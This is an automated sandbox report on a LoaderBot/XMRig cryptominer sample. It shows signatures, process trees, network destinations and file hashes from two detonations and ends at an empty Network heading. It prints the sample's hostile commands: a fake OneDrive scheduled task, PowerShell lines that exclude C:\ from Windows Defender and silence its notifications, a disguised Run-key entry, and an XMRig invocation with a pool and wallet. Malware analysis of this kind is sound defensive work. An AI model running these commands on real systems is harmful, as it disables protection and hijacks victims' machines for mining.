Malware Analysis Report

2024-10-18 23:18

Sample ID 220907-p95b2acbd5
Target 7858706412.zip
SHA256 9ea9441f7c4279b04044795c514dab27c1a7129dc744044207cdd4dba0859dc9
Tags
upx eternity loaderbot xmrig miner persistence loader evasion trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9ea9441f7c4279b04044795c514dab27c1a7129dc744044207cdd4dba0859dc9

Threat Level: Known bad

The file 7858706412.zip was found to be: Known bad.

Malicious Activity Summary

upx eternity loaderbot xmrig miner persistence loader evasion trojan

LoaderBot executable

xmrig

Loaderbot family

Modifies security service

Eternity family

LoaderBot

Modifies Windows Defender Real-time Protection settings

Eternity

LoaderBot executable

XMRig Miner payload

Sets file to hidden

Executes dropped EXE

UPX packed file

Checks computer location settings

Drops startup file

Loads dropped DLL

Deletes itself

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Runs ping.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: RenamesItself

Suspicious use of SendNotifyMessage

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Views/modifies file attributes

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-09-07 13:02

Signatures

Eternity family

eternity

LoaderBot executable

Description Indicator Process Target
N/A N/A N/A N/A

Loaderbot family

loaderbot

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral4

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win10v2004-20220812-en

Max time kernel

99s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4636 set thread context of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1292 set thread context of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4636 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\system32\schtasks.exe
PID 4636 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\system32\schtasks.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 4636 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe
PID 1292 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe C:\Windows\System32\svchost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe

"C:\Users\Admin\AppData\Local\Temp\27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /sc minute /mo 1 /tn OneDrive /rl HIGHEST /tr C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe YmMxcTVjZHZ1N3RlN2xmaDBkOWR4ZndoYTdmNXBzaHl2ZnB0NXVhaGVkLDQ0RHM4ZmJDM0hXUUNjd1FvdGdyTkRVV25tRGl4cFFQRzdZTGg1aDJyelNNUXJ4Q1JYZVNqUXZIOExSUE5HU3lxdlhjS2VFazN1bVo3VDJ3ekZBZ292RjE1VWNrQnhnLDB4MDNlQmFCNjg0ZDNmYjI0QmVERmMzMWREYTRGNTVjQzAyMkU1NzEwMSxYbURTUU1tVjV2eGo4Y3U4eFNraFVjZldmRndtc0FZdDNpLHIzeUExd2VvUlc1THdNY0xoelBvdG1xU3huMjRFNzZXdWgsRFNSRDd6WEtOVXJZZmtpUERTdTFYRFdyZ2dkRTlTTGNRVyxMVVE5SmVHMkpOOUQ1VHRLdnlQRFZ6cWpTUjV4V0h4a3VRLFRQc0xGMmVUVHExMTJVS2Vvb0xWNHFBZzN0b3lDNWg2VE0sR0FZSjZOVkxKM1ZZRVRGVU5JNkxBRDVFREVQRTVEUFhaV1dRUEZWNFlIRkdIU0YzNkc0TENSUE4sQVZENjlIZHF1WEJ1RWpma0FEV0JDcXM1bmVWQ2VXQjMxZyxxcHQ5bXNqaDN0N3VjOTJwbmx3a3NtOWRkbjJrcWhtNmc1ZjQzbWUyZHAsYWRkcjFxeWYyc244dWF6N2o0NDB2ZXM5NmFkZHB1ZWFtOGY5cjlndTh2NDVsc2p4bGw3cWo0cHgwZTY5YTl0MjdlbnF0NDY2NnJlbm1rd2oyeDIzY3dldGZscHlkbGx1cWtwOWszbix0MVNrUzJrS0dvSnRqcHFhUGVWQlltc2JHcXMyR1ZkMWRzbSxHUEpkSk5GS0RORjFKcnZORG5tUXRqNHA1cVJpNWRmWmo1LDEyaEc4S2V3VmtoS1JIZUhmWVFlZEpMSHViWWliTGNBa1h1bjc1ckY0Yld5OVJrUA==

Network

Country Destination Domain Proto
RU 31.41.244.231:80 tcp
US 93.184.221.240:80 tcp
DE 20.52.64.200:443 tcp
RU 31.41.244.231:80 tcp

Files

memory/2012-132-0x0000000000000000-mapping.dmp

memory/4636-133-0x0000000000DF0000-0x000000000143F000-memory.dmp

memory/5052-135-0x00007FF63A32C6E0-mapping.dmp

memory/5052-134-0x00007FF63A2D0000-0x00007FF63A46F000-memory.dmp

memory/5052-140-0x00007FF63A2D0000-0x00007FF63A46F000-memory.dmp

memory/5052-145-0x00007FF63A2D0000-0x00007FF63A46F000-memory.dmp

memory/4636-146-0x0000000000DF0000-0x000000000143F000-memory.dmp

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

memory/4292-149-0x0000000000FE0000-0x000000000162F000-memory.dmp

memory/4636-150-0x0000000000DF0000-0x000000000143F000-memory.dmp

C:\Users\Admin\AppData\Local\OneDrive\OneDrive.exe

MD5 9ec8bc3dbfdcfe1540bd3274181ae9bb
SHA1 a5e610f5e4d56e7ac8c7b6b20a2726cf362ba316
SHA256 27220790475f6cf42fbaff5e5fbdfe452b7d79116547878b01ecdbc1c6a5b942
SHA512 d030b4b8beb58fd683ebb5f883566dbe8fab5a8bacad52f45e428eb71efdd90c6d35629769ac461a35f94471cd57d943d6e6bd8898596919b34eacaca701d117

memory/1292-152-0x0000000000FE0000-0x000000000162F000-memory.dmp

memory/2624-154-0x00007FF63A32C6E0-mapping.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win7-20220812-en

Max time kernel

152s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Security Update\\WinSec.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1892 set thread context of 1708 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 900 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
PID 900 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
PID 900 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe
PID 1892 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 1384 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1892 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 1892 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 1892 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 1892 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 1892 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 1892 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
PID 1892 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe

"C:\Users\Admin\AppData\Local\Temp\bb1e9db6d9b4b5a858987999a1c8b68ea3610382968c36771da27a6625eba776.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Set-MpPreference -PUAProtection 1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath C:\

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Set-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications' -Name DisableNotifications -Value 1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Security Update' -Value '"C:\Users\Admin\AppData\Local\Temp\Windows Security Update\WinSec.exe"' -PropertyType 'String'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe --donate-level 0 --max-cpu-usage 50 -o pool.supportxmr.com:3333 -u 4774bMmQt7g8FfWNP1K51Tdy7v5DS2ZRYarJcEmpy8rAXnuycfKGerFdEawGvgHUnCePRxky732gfcowXbXHcwT69rhLT5w.rig16

Network

